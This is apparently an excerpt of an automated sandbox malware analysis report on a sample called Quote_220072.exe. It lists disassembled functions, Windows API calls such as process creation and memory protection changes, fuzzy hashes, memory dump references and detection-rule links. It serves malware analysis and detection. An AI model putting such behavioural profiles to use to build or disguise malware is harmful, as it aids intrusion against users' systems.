Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Varighedskravs Setup: Installing
API String ID: 1011633862-452364317
Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
GetLastError.KERNEL32 ref: 00405E0E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-297319885
Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8

Function 6FF8167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A44
Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A4A
Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A50

GlobalFree.KERNEL32(00000000), ref: 6FF81738
FreeLibrary.KERNEL32(?), ref: 6FF817C3
GlobalFree.KERNEL32(00000000), ref: 6FF817E9

Part of subcall function 6FF81FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF81FFA

Part of subcall function 6FF817F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FF81708,00000000), ref: 6FF8189A

Part of subcall function 6FF81F1E: wsprintfW.USER32 ref: 6FF81F51

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
Instruction ID: c6dd1827c295a0579d783a89fe0c2cbc59a821cb11c1c30bda7c5a9ab590f1ed
Opcode Fuzzy Hash: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
Instruction Fuzzy Hash: 4541A232404349AFDB209F68D944BDE37F8BF02325F00421EF97D9A296DB79B544C651

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C

Function 00406616 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID:
API String ID: 1879705256-0
Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D

Function 004066B4 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
CloseHandle.KERNEL32(?), ref: 004066EA

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79

Function 004068F9 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15

Function 6FF82D14 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?), ref: 6FF82DD3

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
Instruction ID: d93e78494e09aa6ec4d7f3fdec31074403eedaf14b92a7a433c4b641b89fd750
Opcode Fuzzy Hash: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
Instruction Fuzzy Hash: C741A0769007059FDF009F68DA81BA93BB4EF07338F24422AE535CF3A0D735A4A18B94

Function 004069E9 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4

Function 00406926 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4

Function 6FF81A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FF8501C,00000004,00000040,6FF85034), ref: 6FF81A68

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
Instruction ID: f0236cd0b057474380caad8b95ea0e69724d72aa2d1926dc757d1853453af039
Opcode Fuzzy Hash: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
Instruction Fuzzy Hash: 20F092B4979B42DBCF198F2C94447293FB0B71B374B08452EF27A9A360C3304121AB9E

Function 004062B6 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718

Function 004054C6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C

Function 004054E1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
